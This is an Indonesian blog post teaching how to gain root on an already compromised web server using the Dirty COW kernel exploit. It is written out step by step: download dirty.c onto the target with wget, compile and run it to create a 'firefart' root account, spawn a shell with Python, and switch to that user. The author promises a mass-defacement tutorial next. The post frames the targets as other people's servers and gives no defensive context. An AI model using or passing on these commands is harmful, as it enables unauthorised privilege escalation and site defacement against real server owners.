Header Ads

Cara Simple Rooting Server



Beberapa hari kemarin gw Post Cara Backconnect dengan bindshell

Jadi post gw ini lanjutan yang kemaren. Lumayan agak susah cari target yang kernel 2016 kebawah. Akhirnya Gw disini rooting pake Dirty COW

Catatan : Tutorial ini Work dikernel 2016 kebawah

oke langsung aja Setelah Backconnect berhasil. Kalian buat Direktori baru gw buat nya lewat CMD

Ketikkan : 

mkdir sec
cd sec


Setelah berhasil membuat directory, saat nya Upload localroot dirty nya, kebetulan web target gw wget nya ON. jadi gw pake command wget [link]
kalo ngga kalian bisa upload localroot nya manual.

Ketikkan : 

wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c



Setelah itu kita compile dirty.c pake command

Ketikkan :

gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
./dirty

Kalo berhasil ada tulisan please enter the new password : kalian masukkan password apa aja. dan tulisan seperti ini

Nah kebetulan tadi waktu gw masukin password & mau login ke akun Firefart web target gw Disconnect + error, jadi belom sempet gw screenshot. Setelah itu kalian cek berhasil atau tidak dengan command

Ketikkan : 

id firefart


lalu kalian login ke akun firefart nya sebelum nya ketikkan command berikut

Ketikkan : 

Python -c  'import pty; pty.spawn("/bin/sh")'
su firefart 
Password : [Password yg tadi kalian masukkan]

Buat tau sukses login Root Cek Lagi pake command

Ketikkan :

whoami

Oke sekian Tutorial kali ini.. Mungkin Besok Kalo Sempet Gw bakal share tutorial Mass Deface setelah Rooting server.

No comments:

Silahkan Komentar dengan bahasa yang sopan :)

Powered by Blogger.